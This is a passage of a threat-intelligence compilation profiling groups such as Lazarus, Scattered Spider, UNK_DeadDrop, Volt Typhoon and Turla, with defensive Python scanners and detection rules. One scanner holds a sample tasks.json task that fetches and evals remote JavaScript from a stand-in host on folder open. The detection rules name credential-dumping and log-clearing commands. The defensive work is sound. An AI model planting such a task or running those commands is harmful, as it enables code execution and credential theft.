exploit and tied to a parallel Drift heist. The reporting further states that the Lazarus umbrella within North Korea’s Reconnaissance General Bureau accounts for much of North Korean state-backed crypto theft. The actor is also described as targeting software supply chains and developers. Sonatype reporting in the content tracks a Lazarus Group npm campaign using dozens of malicious packages and brandjacking techniques such as suffix addition, embedding, version mimicry, and typosquatting.
In that campaign, malicious packages such as buffer-utilities acted as droppers for Node.js backdoor and downloader payloads that collected host information, contacted command-and-control infrastructure, created hidden .vscode directories, downloaded additional payloads, and executed attacker-controlled code. ESET reporting in the content also states that Lazarus continued Operation DreamJob targeting European drone manufacturers and that Operation DangerousPassword led to compromise of the axios JavaScript library on npm through a maintainer account compromise. The content links Lazarus or Lazarus-aligned activity to advanced malware and intrusion tradecraft used against cryptocurrency and financial targets. Elastic reporting states that PHANTOMPULSE, a final-stage RAT in the REF6598 intrusion chain targeting the cryptocurrency sector, aligns closely with DPRK-linked clusters including Lazarus, BlueNoroff, UNC5342/Contagious Interview, and APT38. PHANTOMPULSE is described as using blockchain-based command and control via Blockscout-accessible Ethereum, Base, and Optimism data; AMSI, WLDP, and ETW bypasses using hardware breakpoints and a vectored exception handler; direct-syscall techniques; UAC bypass; and multiple process injection methods including module stomping, Debug API-driven execution, and manual DLL mapping. The malware also performs reconnaissance, persistence via scheduled tasks, screenshot capture, keylogging, clipboard monitoring, and targeting of cryptocurrency wallets and messaging applications. Separate reporting in the content documents a Lazarus-linked memory-only malware ecosystem composed of DPAPILoader, RemotePELoader, and RemotePE, targeting financial and cryptocurrency organizations. 
This framework uses victim-specific DPAPI decryption, reflective PE loading, direct-syscall techniques including HellsGate/TartarusGate, remapping of clean DLLs to evade user-mode hooks, ETW suppression, encrypted in-memory execution, and actor-in-the-loop payload delivery. Fox-IT reporting says this activity overlaps with AppleJeus and Gleaming Pisces and reflects a transition from older Lazarus tooling such as ThemeForestRAT and PondRAT to a stealthier memory-only toolset designed for long-duration access, data theft, financial fraud, and large-scale financial heists.
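The four brandjacking techniques named in the Sonatype reporting above (suffix addition, embedding, version mimicry, typosquatting) are mechanical enough to check before a dependency is added. The classifier below is an added example, not Sonatype's detection logic. It scores a candidate package name against a list of well-known names; the popular-package list, the edit-distance thresholds and the sample candidates (including the `buffer-utilities` name from the text) are this example's assumptions.

```python
"""Brandjacking checks for npm package names: suffix addition, embedding,
version mimicry and typosquatting against a list of well-known names.

Added example (not Sonatype's tooling). POPULAR, the thresholds and the
sample candidates are assumptions; feed it a registry allowlist or the
dependency names from a lockfile.
"""
import re
import sys

SEP = re.compile(r"[-_.]")

# Constructed allowlist of names an attacker would want to look like.
POPULAR = ["buffer", "lodash", "express", "axios", "react", "chalk", "debug", "request", "commander"]


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein plus adjacent swaps,
    so "lodahs" is one edit from "lodash"."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(candidate: str, popular: list[str]) -> list[tuple[str, str]]:
    """Return (technique, mimicked_name) pairs. An empty list means the name
    is either exactly a known package or unlike any of them."""
    name = candidate.lower().split("/")[-1]  # drop an npm @scope/ prefix
    findings = []
    for base in popular:
        base = base.lower()
        if name == base:
            continue
        # version mimicry: base name plus a version-like tail (axios2, lodash-4.17)
        if re.fullmatch(re.escape(base) + r"[-_.]?v?\d+(\.\d+)*", name):
            findings.append(("version_mimicry", base))
            continue
        # suffix addition / embedding: base survives as a whole token
        tokens = SEP.split(name)
        if base in tokens:
            kind = "suffix_addition" if tokens[0] == base else "embedding"
            findings.append((kind, base))
            continue
        # embedding without separators (bufferutils); short bases are too noisy
        if len(base) >= 4 and base in name:
            findings.append(("embedding", base))
            continue
        # typosquat: within one edit (two for long names) of a known package
        if osa_distance(name, base) <= (1 if len(base) < 8 else 2):
            findings.append(("typosquat", base))
    return findings


if __name__ == "__main__":
    samples = sys.argv[1:] or ["buffer-utilities", "lodahs", "axios2", "node-lodash-utils", "@evilorg/expres", "express"]
    for cand in samples:
        verdicts = classify(cand, POPULAR) or [("ok", "-")]
        print(f"{cand:24s} " + ", ".join(f"{kind}->{base}" for kind, base in verdicts))
```

Every hit is a review prompt, not a block: "node-lodash-utils" is also how a legitimate wrapper is named. The useful control is to run this over newly added dependency names in CI and require a human to acknowledge anything that scores, which is cheap because an honest lockfile rarely changes.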

Mentions: 5 · Origin: KP
#14 TA505
Financially Motivated

TA505 is a financially motivated cybercrime threat actor active since at least 2014. The content links TA505 with the Cl0p/Clop ransomware and extortion operation and notes aliases including FIN11, Hive0065, Graceful Spider, Gold Tahoe, Monty Spider, Spandex Tempest, and Lace Tempest. The group has historically delivered malware including Dridex, TrickBot, Locky, Clop/Cryptomix, MINEBRIDGE, and SDBbot, and more recently has conducted targeted attacks across North America, Asia, Africa, and South America. Observed tradecraft in the provided content includes spear-phishing and malicious spam, including lures impersonating Onehub and HR representatives; macro-enabled Office documents; JavaScript-based execution; PowerShell for malware delivery, reconnaissance, and command execution; use of cmd.exe; disabling Windows Defender and other security products; credential theft; and use of tools such as AdFind, BloodHound, Mimikatz, PowerSploit, and PingCastle. IBM X-Force linked Hive0065/TA505 activity to campaigns using spoofed cloud-storage infrastructure, custom DLL payloads with Cobalt Strike-like code, Meterpreter components, and the SDBbot RAT. SDBbot is described as a second-stage payload used for remote control, command execution, video recording, data exfiltration, persistence, and delivery of additional payloads. The content also associates TA505/Cl0p with exploitation of managed file transfer and enterprise application vulnerabilities for large-scale data theft and extortion. Specifically mentioned are exploitation of SolarWinds Serv-U CVE-2021-35211, MOVEit Transfer CVE-2023-34362, Cleo Harmony/VLTrader/LexiCom CVE-2024-50623 and CVE-2024-55956, and Oracle E-Business Suite CVE-2025-61882. In the Serv-U intrusions, attackers exploited the server to execute commands, deployed Cobalt Strike via PowerShell, performed reconnaissance and lateral movement, and established persistence by hijacking the RegIdleBackup scheduled task to load FlawedGrace RAT. 
The content further states that Cl0p has specialized since 2020 in exploiting previously unknown vulnerabilities in secure file transfer platforms, including earlier Accellion FTA and GoAnywhere MFT campaigns. The provided reporting characterizes Cl0p/TA505 as emphasizing data theft and extortion, often without encryption, in campaigns such as GoAnywhere and MOVEit. Victims are pressured through delayed extortion emails and publication on the group’s leak site. The content does not provide high-confidence evidence that TA505 is a nation-state actor; it consistently describes the group as financially motivated cybercrime.

Mentions: 5
#15 CL-CRI-1089

CL-CRI-1089 is a cybercrime activity cluster tracked by Palo Alto Networks Unit 42 and assessed to have been active since at least early 2023. The cluster is linked to large-scale malvertising operations targeting both Windows and macOS users. Reported campaigns associated with CL-CRI-1089 include Operation FlutterBridge on macOS; the earlier macOS JSCoreRunner campaign, also referred to as FileRipple; and Windows-focused activity involving RecipeLister, Calendaromatic, DocuFlex, AppSuite PDF, and attacks under the TamperedChef campaign umbrella. Some reporting also notes overlap with the broader TamperedChef or EvilAI activity. The group distributes trojanized but functional applications through malicious Google and YouTube ads and sponsored search results, often using shell companies and verified corporate entities to purchase advertising and sign code. Named entities linked in reporting include AdsParkPro LTD, Advantage Web Marketing LLC, and SOFT WE ART LIMITED, with some content stating the cluster primarily leveraged corporate structures connected to Ukrainian entities for code signing. Observed samples were signed with legitimate certificates or valid Apple Developer IDs, and macOS samples passed Apple notarization. On macOS, CL-CRI-1089 deployed FlutterShell via fake applications including PodcastsLounge, PDF-Brain, and PDF-Ninja as part of Operation FlutterBridge. FlutterShell is described as a backdoor with adware and browser-hijacking functionality. Reported capabilities include arbitrary command execution, file system interaction, environment variable exfiltration, system fingerprinting, browser session theft, and modification of Google Chrome Secure Preferences to redirect searches and new tabs to attacker-controlled ad sites such as sinterfumesco[.]com. The malware uses a Flutter/WebView architecture with a JavaScript-to-native bridge, allowing malicious logic to be hosted remotely and changed dynamically without updating the binary.
Some variants included an AI document summarization feature that sent uploaded documents to attacker-controlled servers. Across reporting, CL-CRI-1089 is characterized as a broad, evolving malvertising-driven cybercrime operation using polished lure sites, trojanized productivity software, code-signing abuse, and rapidly changing infrastructure to distribute adware, browser hijackers, and backdoor-capable malware.

Mentions: 5 · Origin: GB
#16 Scattered Spider
Financially Motivated

Scattered Spider is a financially motivated cybercrime threat actor active since at least May 2022. It is tracked under numerous aliases including UNC3944, Octo Tempest, Muddled Libra, Scatter Swine, 0ktapus/Oktapus, Roasted 0ktapus, StarFraud, DEV-0971, LUCR-3, and STORM-0875. Public reporting in the provided content also describes it as a loosely affiliated or umbrella cluster rather than a single tightly bounded group. The group is known for aggressive social engineering and identity-focused intrusion tradecraft, especially voice phishing and help-desk impersonation. Reported techniques include impersonating internal IT personnel, phishing phone calls and targeted SMS, SIM swapping, MFA fatigue, bypassing MFA, exploiting IT support processes, contacting victim support teams, and using victims’ personal information to coerce disclosure of credentials. The content also notes credential theft through phishing pages, session and credential theft, use of infostealers such as Raccoon Stealer, and review of internal documentation and procedures after access to expand privileges and reach sensitive systems. Scattered Spider has targeted organizations primarily in the United States, with later reporting indicating campaigns against UK and US retail, and activity affecting hospitality, telecommunications, technology, cryptocurrency-related entities, media, entertainment, financial services, insurance, aviation, and SaaS/cloud-centric enterprises. The content specifically references compromises or attributed activity involving Twilio, Cloudflare, Reddit, Caesars Entertainment, MGM Resorts International, Marks & Spencer, Harrods, Qantas-related airline targeting, and broader targeting of platforms and environments such as Okta, Salesforce, Microsoft 365, SharePoint, OneDrive, and VMware vCenter. 
The actor has been publicly linked to the 2022 Twilio and Cloudflare activity and is associated with the 0ktapus campaign targeting technology companies through SMS phishing and fake Okta login pages. Okta assessed Scatter Swine as the same actor as 0ktapus. The group is also described as being behind or linked to the 2023 Las Vegas casino intrusions, including reporting that access to MGM was obtained through a short help-desk social-engineering call. Since mid-2023, the content states that Scattered Spider has conducted double-extortion campaigns using BlackCat/ALPHV ransomware, including deployment on Windows, Linux, and later VMware ESXi systems. Reported post-compromise tradecraft includes use of VPN access and remote monitoring and management tools for persistence; exploitation of stolen Azure credentials and a ForgeRock OpenAM vulnerability; Bring Your Own Vulnerable Driver techniques to bypass endpoint security; deployment of RattyRAT; targeting of VMware vCenter with the bedevil Linux rootkit; mailbox-rule modification to delete emails from security vendors and exfiltrate email; and data exfiltration via transfer.sh, Rclone, MEGAsync, Dropbox, Gofile, shz.al, Storj, Temp.sh, Paste.ee, Backblaze, and AWS S3. The content also notes use of residential proxy services such as NSOCKS and TrueSocks, WMI via Impacket for lateral movement, enumeration of remote systems including VMware vCenter infrastructure, retrieval of browser histories via infostealer malware, searching for credential-storage documentation, and use of self-signed and stolen certificates, including certificates originally issued to NVIDIA and Global Software LLC. The provided reporting repeatedly associates Scattered Spider with English-speaking actors and with the broader Com ecosystem, alongside overlaps or shared playbooks with groups such as LAPSUS$ and ShinyHunters. 
Some reporting cited in the content describes members as native English-speaking individuals roughly 17 to 22 years old, primarily in Western countries, and notes arrests in late 2024 followed by renewed activity in 2025. The content also references sub-grouping or analytical overlap under labels such as Scattered LAPSUS$ Hunters.

Mentions: 4
#17 UNK_DeadDrop

UNK_DeadDrop is a threat cluster tracked by Proofpoint and assessed as likely North Korea-aligned. Proofpoint observed the activity between April and May 2026, during which the actor sent more than 250 phishing emails to individuals at nearly 100 organizations, primarily in the United States. Targeted sectors included cryptocurrency, finance, technology, education, business services, financial services, entertainment and media, and telecommunications, with a particular focus on developers and organizations handling cryptocurrency assets. The actor used fake job offers, developer recruitment, code review, and technical testing lures. It impersonated legitimate companies including Ondo Finance, Nourish, Hypen Connect, Empower Pharmacy, NXLog, OnePlan, and Valon, and also used fabricated startup identities such as Pulsynk and Trixauvex. The phishing emails directed victims to attacker-controlled GitHub and GitLab repositories presented as coding assignments, open-source projects, or cryptocurrency-related projects. The repositories contained hidden .vscode/tasks.json files configured to execute automatically when opened in Visual Studio Code or Cursor. Proofpoint reported that Cursor executed the malicious task without prompting the user, while VS Code required approval. The execution chain launched platform-specific malware for macOS, Linux, and Windows and installed a malicious VS Code extension disguised as a Google service. On macOS and Linux, the extension provided persistence by relaunching the malware when the editor was opened; on Windows, the infection path was described as a single infostealer operation without persistence. On macOS and Linux, UNK_DeadDrop used modified binaries based on the open-source Overlord command-and-control framework, maintaining persistent WebSocket connectivity to attacker-controlled infrastructure. Proofpoint reported custom Overlord modules including browserlogin, companywallet, and cleanup. 
On Windows, the malware executed within the editor's Electron process using JavaScript and Python payloads. The malware supported remote access, credential theft, browser data theft, and cryptocurrency wallet theft. Reported collection included browser credentials, cookies, Safe Storage keys, browser wallet extension data, standalone wallet directories, Firefox and Chromium profile data, and data from 35 wallet browser extensions and 18 standalone wallet applications on Windows. On macOS, the actor used a fake system password prompt via darwin-password-prompt to capture the user's password, then modified Keychain access controls and extracted credentials from browsers including Chrome, Brave, Edge, Opera, Vivaldi, Arc, Yandex, and Chromium. On Linux, it used Zenity-based fake prompts and attempted to extract GNOME Keyring secrets. Stolen data was compressed and exfiltrated to attacker-controlled infrastructure including 23.137.105[.]75:5173. Proofpoint identified overlaps with the DPRK-linked Contagious Interview activity cluster in targeting, social engineering, and theft objectives, but tracked UNK_DeadDrop as a distinct cluster due to differences in telemetry, infrastructure, scale, delivery method, and payload implementation. Specifically, Proofpoint noted email-based initial access rather than LinkedIn-centric lures, abuse of tasks.json auto-execution rather than npm installation, and use of Overlord-based tooling instead of malware families such as OtterCookie and FlexibleFerret. Known aliases and tracked names in the provided content: UNK_DeadDrop, unk_deaddrop. Related activity overlap noted in the content: Contagious Interview.
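The delivery trick above, a task in `.vscode/tasks.json` that starts when the folder is opened, is worth checking for before opening any recruiter-supplied repository. The scanner below is an added example, not Proofpoint's tooling. It assumes the documented VS Code mechanism, a task with `"runOptions": {"runOn": "folderOpen"}`; VS Code gates such tasks behind Workspace Trust and the `task.allowAutomaticTasks` setting, and the reporting above states that Cursor ran the task without prompting. tasks.json is JSONC (comments and trailing commas are allowed), so a small stripper precedes `json.loads`. The sample file is constructed for this example.

```python
"""Find VS Code / Cursor tasks that run automatically on folder open.

Added example (not Proofpoint's tooling). The JSONC stripper, the
"hidden" heuristic and the sample tasks.json are this example's assumptions.
"""
import json
import sys
from pathlib import Path


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments and trailing commas, outside strings only."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:  # keep the escaped character verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
            continue
        if c == '"':
            in_str = True
            out.append(c)
            i += 1
            continue
        if text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j < 0 else j
            continue
        if text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j < 0 else j + 2
            continue
        if c in "}]":  # drop a trailing comma left before this closer
            k = len(out)
            while k and out[k - 1] in " \t\r\n":
                k -= 1
            if k and out[k - 1] == ",":
                del out[k - 1]
        out.append(c)
        i += 1
    return "".join(out)


def find_auto_tasks(text: str) -> list[dict]:
    """Return every task that runs on folder open, with its command line."""
    data = json.loads(strip_jsonc(text))
    hits = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        command = task.get("command", "")
        if not isinstance(command, str):  # per-OS command objects
            command = json.dumps(command)
        args = [str(a) for a in task.get("args") or []]
        presentation = task.get("presentation") or {}
        hits.append({
            "label": task.get("label", "<unnamed>"),
            "type": task.get("type", "<none>"),
            "command": " ".join([command, *args]).strip(),
            # a task that never reveals its terminal is trying not to be seen
            "hidden": bool(task.get("hide")) or presentation.get("reveal") == "never",
        })
    return hits


def scan_checkout(root: Path) -> dict[str, list[dict]]:
    """Check every .vscode/tasks.json under root (a clone, or a whole home dir)."""
    results = {}
    for tasks in root.rglob("tasks.json"):
        if tasks.parent.name != ".vscode":
            continue
        try:
            hits = find_auto_tasks(tasks.read_text(errors="replace"))
        except json.JSONDecodeError:
            continue
        if hits:
            results[str(tasks)] = hits
    return results


# Constructed sample: one honest build task and one hidden folder-open task
# that pulls and evals remote JavaScript. Not the actor's real file.
SAMPLE_TASKS_JSON = r'''{
  // project tasks
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "npm", "script": "build", "problemMatcher": [], },
    {
      "label": "env-setup",
      "type": "shell",
      "command": "node",
      "args": ["-e", "require('https').get('https://example.invalid/s',r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})"],
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never", "echo": false },
      "hide": true
    }
  ]
}'''

if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else Path.cwd()
    for path, hits in scan_checkout(root).items():
        for h in hits:
            flag = "HIDDEN " if h["hidden"] else ""
            print(f"{path}: {flag}{h['label']} [{h['type']}] {h['command'][:100]}")
```

Run it on a clone before opening it in an editor, and set `"task.allowAutomaticTasks": "off"` in user settings on machines that handle untrusted repositories. Cursor reads the same `.vscode` directory, so the scan covers both editors named in the reporting.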

Mentions: 4 · Origin: KP
#18 Volt Typhoon

Volt Typhoon is a Chinese state-sponsored threat actor associated with long-term intrusions into U.S. critical infrastructure, including utilities, ports, telecommunications-related environments, agricultural systems, transportation systems, water treatment, the electrical grid, and networks supporting U.S. military installations overseas. The content describes the group as part of PRC state activity and, in one reference, as military cyber actors. Known aliases in the provided content include Bronze Silhouette, DEV-0391, Insidious Taurus, Storm-0391, UNC3236, Vanguard Panda, and Voltzite. The group is described as operating since at least 2019 and emphasizing pre-positioning and persistence in critical infrastructure, with CISA reporting that it remained in infrastructure for months without overt action. Its tradecraft relies heavily on valid accounts and living-off-the-land techniques rather than custom malware or zero-days. Reported initial access methods include exploitation of vulnerabilities in edge and networking devices, specifically Fortinet, Ivanti, and Cisco appliances, as well as use of outdated routers and compromised SOHO/router infrastructure. Observed techniques in the provided content include use of T1078 Valid Accounts; hands-on-keyboard activity via the Windows command line; PowerShell for remote system discovery; WMIC for execution, remote system discovery, and temporary directory creation; Tasklist for process enumeration; Registry queries such as reg query hklm\software\ to identify installed software including PuTTY; obtaining the victim system's current location; use of legitimate network and forensic tools and customized open-source tools for command and control; and use of legitimate-looking filenames such as cisco_up.exe, cl64.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPreSV.exe, and WmiPrvSE.exe for Earthworm and Fast Reverse Proxy tools. 
The content also states that Volt Typhoon stole files from sensitive file servers, staged stolen files including ntds.dit and the SYSTEM and SECURITY registry hives in C:\Windows\Temp\, extracted event logs with Wevtutil, targeted network administrators' browser data including browsing history and stored credentials, attempted to obtain credentials from OpenSSH, RealVNC, and PuTTY, and deleted artifacts using rd /S and by removing systeminfo.dat from C:\Users\Public\Documents.

Mentions: 4 · Origin: CN
#19 DragonForce

DragonForce is a financially motivated ransomware-as-a-service operation, later described as a self-styled ransomware cartel, active since at least August 2023. Reporting in the provided content describes it as a rapidly expanding double-extortion actor that exfiltrates data before encryption and uses leak-site publication and public disclosure threats to pressure victims. Multiple sources in the content state there is no evidence of nation-state sponsorship or ideological affiliation. Several reports assess DragonForce as likely part of the broader Russian-speaking cybercriminal ecosystem, or likely originating from Russia/CIS, based in part on its explicit prohibition on targeting Russia and other CIS organizations. The group operates centralized criminal infrastructure for affiliates, including leak sites, negotiation panels, file servers, admin/client panels, and automated payment-splitting. Its leak site is referred to as DragonBlog. DragonForce supports attacks against Windows, Linux, VMware ESXi, BSD, and NAS environments, and advertises configurable encryption modes and operational features such as delayed execution, multithreading, background execution, and dry-run testing. The content also states that DragonForce uses defense evasion techniques including terminating security processes and deleting backups and shadow copies. DragonForce’s model evolved from a more traditional RaaS program into a broader cartel structure. In March 2025 it introduced a cartel model allowing affiliates to create their own brands while using DragonForce infrastructure and tools. The content also describes a low-barrier affiliate model over time, including later mass recruitment and white-label-style services. 
DragonForce integrated an initial access broker platform called Suppliers for brokering VPN, Citrix, RDP, and botnet access, and advertised extortion-support services including data analysis, executive letters, call scripts, and negotiation support through a partner called Verified. It has also been described as emphasizing public relations and coalition branding, including partnership claims on criminal forums. The content links DragonForce to aggressive ecosystem expansion and consolidation. It reportedly partnered with BreachForums to integrate stolen-data distribution with ransomware operations. It announced a coalition with LockBit and Qilin in September 2025, although one report noted no verified evidence of shared infrastructure or joint operations. Multiple reports state DragonForce absorbed, displaced, or recruited affiliates from rival operations including BlackLock and RansomHub, and that it attacked rival groups such as BlackLock and Mamona by defacing their sites and leaking internal communications. One report also mentions DragonForce as a possible culprit in the LockBit panel compromise, but that attribution is presented only as a possibility. Targeting in the provided content is global, with victims in more than 30 countries and the United States identified as the primary target. Sectors explicitly mentioned include manufacturing, business services, technology, construction, healthcare, IT services and consulting, architecture and planning, law practice, real estate, machinery manufacturing, transportation, retail, and finance. One report states DragonForce most heavily targets manufacturing. Another notes increased finance-sector victimization and expects DragonForce to maintain or increase tempo against finance targets. The content also states DragonForce has compromised more than 400 organizations worldwide, while another report says it had listed about 136 victims on its leak site as of March. 
Operationally, DragonForce is described as using affiliates and allowing multiple groups to use its leak site and infrastructure, which complicates attribution because different victims may reflect different affiliate tradecraft. The content states DragonForce obtains access through exposed services, credential compromise, and integrated access-broker channels. In one Sophos investigation, attackers exploited SimpleHelp vulnerabilities CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726 via a managed service provider to conduct reconnaissance and deploy DragonForce ransomware into downstream customer environments, with encryption and data exfiltration observed. The content also links DragonForce to major UK retail incidents, including Marks & Spencer, Co-op, and Harrods, with reporting stating DragonForce malware was used under a ransomware-for-hire arrangement and that researchers believed the retail attacks involved collaboration with Scattered Spider. DragonForce also claimed attacks against Belk and possession of approximately 156 GB of stolen Belk data. The content describes DragonForce as highly active and growing. It was identified as the most active group in one leak-site dataset with a reported 428.6% surge in posts, and other reporting notes substantial victim growth after the shutdown of RansomHub. Additional aliases or sub-groups are not clearly established in the provided content beyond the group’s own branding as a cartel and its infrastructure/services such as DragonBlog and Suppliers.

Mentions: 4
#20 VerdantBamboo

VerdantBamboo is a China-nexus, state-linked espionage threat actor tracked by Volexity. Volexity reported overlap with Clay Typhoon (Microsoft), UNC5221 (Google), and Warp Panda (CrowdStrike), and the content also explicitly identifies VerdantBamboo as WARP PANDA and UNC5221. In the reported activity, VerdantBamboo maintained covert access to a victim environment for at least 18 months and targeted edge appliances and proprietary systems that typically lack EDR coverage, including an Egnyte Storage Sync appliance, a Synology NAS, and a managed services provider's pfSense firewall. Volexity assessed with medium confidence that compromise of the MSP enabled the downstream victim intrusion. Observed tradecraft included use of valid credentials, abuse of a local privilege escalation condition in Egnyte Storage Sync fixed in version 13.13, living-off-the-land techniques, cron-based persistence, SSH access, use of SSL VPN access, and use of compromised appliances as covert proxies to reach the victim's Microsoft 365 environment while blending with legitimate traffic and evading Conditional Access controls. After remediation, the actor returned using stolen administrative credentials to access the victim firewall, enabled web SSL VPN access, and pivoted internally. Malware and tooling directly mentioned in the content include BRICKSTORM, a Golang remote access trojan used as a primary implant, including a FreeBSD/BSD variant deployed on pfSense; PLENET, also known as GRIMBOLT, a previously undocumented cross-platform backdoor built from .NET Core using Native AOT that supports an interactive shell, remote command execution, file manipulation, and C2 switching; and AGENTPSD, a Python-based reverse shell assessed to serve as a fallback implant. Volexity described VerdantBamboo as highly sophisticated and noted its focus on combining malware deployment with stealthy abuse of edge infrastructure and systems that traditionally do not or cannot run EDR software.

Mentions: 4 · Origin: CN
#21 Turla

Turla is a Russian state-sponsored, Russian-speaking cyberespionage threat actor that has conducted espionage operations for more than a decade. The group primarily targets foreign governments, embassies, and other government organizations, including European government entities, and has also targeted Ukraine-related defense and government organizations. Reported aliases in the provided content include ATG26, Belugasturgeon, Blue Python, Group 88, Iron Hunter, Krypton, Pensive Ursa, Secret Blizzard, Snake, Turla APT, Turla Team, Uroburos, Venomous Bear, Waterbug, WhiteBear, and Wraith. The content describes Turla using custom malware and overlapping backdoor access to maintain persistence while evading defenses. Malware and tooling explicitly associated with Turla here include Kazuar (including Kazuar v2 and v3, described as Turla’s flagship backdoor), Carbon, HyperStack, RPC backdoors, JavaScript backdoors, DeliveryCheck, and the Epic dropper. In one Accenture-reported intrusion against a European government organization, Turla used HyperStack, Kazuar, and Carbon together, with varied command-and-control implementations including compromised legitimate websites, internal proxy nodes, and Pastebin-based tasking to preserve reentry options. 
Observed techniques in the content include persistence via HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run using the value local_update_check and by saving a custom executable containing Metasploit shellcode to the Startup folder; command execution via cmd.exe and PowerShell; in-memory AMSI bypass by patching amsi.dll in PowerShell scripts; use of Google Apps Script as command-and-control for a JavaScript backdoor; file upload from victim machines via RPC backdoors; process discovery using tasklist /v and enumeration of processes tied to specific ports or named pipes; network and system survey activity using arp -a, nbtstat -n, net config, ipconfig /all, route, NBTscan, and fsutil fsinfo drives; and use of named-pipe RPC communications and IPC$ shares for lateral movement in HyperStack. The content also states that Turla has obtained and customized publicly available tools such as Mimikatz, and that Microsoft and CERT-UA warned of Turla attacks targeting the defense industry and Microsoft Exchange servers with the DeliveryCheck backdoor. Google Threat Intelligence Group and other reporting cited in the content state that Turla exploited CVE-2025-8088 alongside other Russia-aligned actors. Separate ESET reporting in the content provides technical evidence of direct operational collaboration between Gamaredon and Turla in incidents from February to June 2025, where Gamaredon tooling including PteroGraphin and PteroOdd was used to deploy Turla’s Kazuar backdoor and, in at least one case, restore Turla’s access after loss of foothold.
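Both the Volt Typhoon profile above and this Turla profile describe hands-on-keyboard living-off-the-land activity (reg query, tasklist /v, arp -a, nbtstat -n, net config, ntds.dit and hive staging in C:\Windows\Temp, Wevtutil log export, a Run key value named local_update_check, renamed proxy binaries). None of those commands is malicious on its own, so detection has to combine single high-signal events with a burst of otherwise benign survey commands. The rules below are an added example serving both profiles, not detection content from CISA, Accenture or any other cited source. The events are constructed Sysmon-style records; the field names, patterns, thresholds and severities are this example's assumptions.

```python
"""Detection logic over process-creation events for the living-off-the-land
tradecraft described for Volt Typhoon and Turla.

Added example, not tooling from any cited report. Events are constructed
Sysmon-style records (host, image, command line, timestamp); the rules,
thresholds and field names are assumptions of this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Single-event rules: (name, pattern, severity), matched case-insensitively
# against the full command line.
RULES = [
    ("ntds_or_hive_copied_to_temp",
     r"(ntds\.dit|reg(\.exe)?\s+save\s+hklm\\(system|security)\b).*c:\\windows\\temp\\", "high"),
    ("wevtutil_export_or_clear", r"\bwevtutil(\.exe)?\s+(epl|cl|export-log|clear-log)\b", "high"),
    ("run_key_local_update_check", r"\\currentversion\\run\b.*\blocal_update_check\b", "high"),
    ("reg_query_installed_software", r"\breg(\.exe)?\s+query\s+hklm\\software\\", "low"),
    ("rd_recursive_cleanup", r"\brd\s+/s\b", "low"),
]
# Commands that together make up the survey both actors run by hand.
SURVEY = [r"\barp\s+-a\b", r"\bnbtstat\s+-n\b", r"\bnet\s+config\b", r"\bipconfig\s+/all\b",
          r"\broute\b(\s+print)?", r"\btasklist\s+/v\b", r"\bfsutil\s+fsinfo\s+drives\b"]
# Filenames Volt Typhoon reused for Earthworm / Fast Reverse Proxy binaries;
# suspicious when the image lives outside the Windows or Program Files trees.
MASQUERADE = {"cisco_up.exe", "cl64.exe", "vm3dservice.exe", "watchdogd.exe",
              "win.exe", "wmipresv.exe", "wmiprvse.exe"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def evaluate(events, window=timedelta(minutes=10), min_survey=3):
    """Return (severity, rule, host, detail) tuples for the given events."""
    findings = []
    survey_seen = defaultdict(list)  # host -> [(timestamp, survey pattern index)]
    for ev in events:
        cmd = ev["cmdline"]
        for name, pat, sev in RULES:
            if re.search(pat, cmd, re.I):
                findings.append((sev, name, ev["host"], cmd))
        base = ev["image"].rsplit("\\", 1)[-1].lower()
        if base in MASQUERADE and not ev["image"].lower().startswith(TRUSTED_DIRS):
            findings.append(("medium", "proxy_tool_masquerade", ev["host"], ev["image"]))
        for idx, pat in enumerate(SURVEY):
            if re.search(pat, cmd, re.I):
                survey_seen[ev["host"]].append((ev["ts"], idx))
    # Survey burst: at least min_survey distinct survey commands on one host
    # inside the window. One ipconfig is noise; four different ones are not.
    for host, hits in survey_seen.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            distinct = {idx for t, idx in hits[i:] if t - t0 <= window}
            if len(distinct) >= min_survey:
                findings.append(("medium", "survey_burst", host,
                                 f"{len(distinct)} distinct survey commands within {window}"))
                break
    return findings


T0 = datetime(2026, 1, 10, 2, 0)


def ev(minutes, host, image, cmdline):
    return {"ts": T0 + timedelta(minutes=minutes), "host": host, "image": image, "cmdline": cmdline}


# Constructed telemetry: one benign admin command on WS07, then a compressed
# Volt Typhoon / Turla style sequence on DC01.
SAMPLE_EVENTS = [
    ev(0, "WS07", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ev(1, "DC01", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c reg query hklm\software\ /s"),
    ev(2, "DC01", r"C:\Windows\System32\cmd.exe", "cmd.exe /c tasklist /v"),
    ev(3, "DC01", r"C:\Windows\System32\cmd.exe", "cmd.exe /c arp -a & nbtstat -n & net config workstation"),
    ev(5, "DC01", r"C:\Windows\System32\cmd.exe",
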